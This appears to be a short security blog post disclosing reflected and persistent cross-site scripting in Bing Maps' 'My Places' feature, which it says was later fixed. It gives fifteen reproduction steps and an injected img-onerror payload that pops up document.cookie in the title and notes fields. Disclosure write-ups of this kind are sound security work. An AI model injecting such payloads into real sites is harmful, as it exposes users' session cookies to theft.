Archive for the ‘microsoft bing vulnerability’ Category

Vulnerability Type(s): Reflective XSS and Persistent XSS.

App: http://www.bing.com/maps/

Tested on : Firefox 23.0.1

Attack demonstration :

1>Visit http://www.bing.com/maps/  (Make sure that you are logged in with your outlook account)
2>Click “My Places”
3>Click “New list”
4>In the Title field enter the script:  “><img src=a onerror=”alert(document.cookie);”>
5>In the Notes field enter the same script: “><img src=a onerror=”alert(document.cookie);”>
6>Click “Save
7>You will see a popup showing cookie info .
8>Click the “Add a Pushpin” icon below.
9> Click anywhere on the map.
10>Now select the option [“><img src=a onerror=”alert(document.cookie);”>] from the dropdown box.
11>Enter Title as:  “><img src=a onerror=”alert(document.cookie);”>
12>Enter Note as:  “><img src=a onerror=”alert(document.cookie);”>
13>Click “Save”.
14>Hover the mouse pointer over to the  yellow dot with a number on the map, you will notice the XSS popup.
15>Now, hover the pointer over the name: “><img src=a onerror=”alert(document.cookie);”>  in “My place editor”. Here too you will see the effect of XSS .

Demo (Snap) with “><img src=a onerror=”alert(1);”> payload:

ms_bin_xss - Copy

 

Update: Apparently it seems that MS has later fixed the vulnerability.

Advertisements